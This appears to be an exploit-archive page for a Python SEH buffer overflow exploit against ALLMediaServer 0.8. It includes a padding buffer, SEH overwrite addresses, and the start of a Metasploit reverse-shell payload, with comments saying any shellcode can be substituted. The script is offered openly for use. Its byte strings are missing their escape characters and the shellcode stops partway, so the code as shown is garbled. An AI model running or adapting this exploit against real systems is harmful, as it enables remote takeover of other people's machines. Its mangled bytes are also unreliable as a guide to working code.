[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ALLMediaServer 0.8 SEH Overflow Exploit
# Published : 2012-07-06
# Author :
# Previous Title : Ezhometech Ezserver 6.4 Stack Overflow Exploit
# Next Title : MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption

# Exploit Title: seh exploit, BOF 
# Date: 04/07/2012
# Exploit Author: motaz reda 
# my E-mail:  motazkhodair@gmail.com
# Software Link: http://allmediaserver.org/
# Version: ALLMediaServer 0.8
# Tested On: Windows 7 ultimate


import sys, socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((sys.argv[1], 888))

buffer = "A" * 1072

buffer += "xebx06x90x90"   #NSEH  jmp short 6

buffer += "xcax24xecx65"   # SEH  POP POP RETN

# msfpayload windows/shell_reverse_tcp 
# you can replace the shellcode with any shellcode u want

buffer += ("xd9xc8xd9x74x24xf4xb8xa6xaaxb6xadx5bx2bxc9xb1"

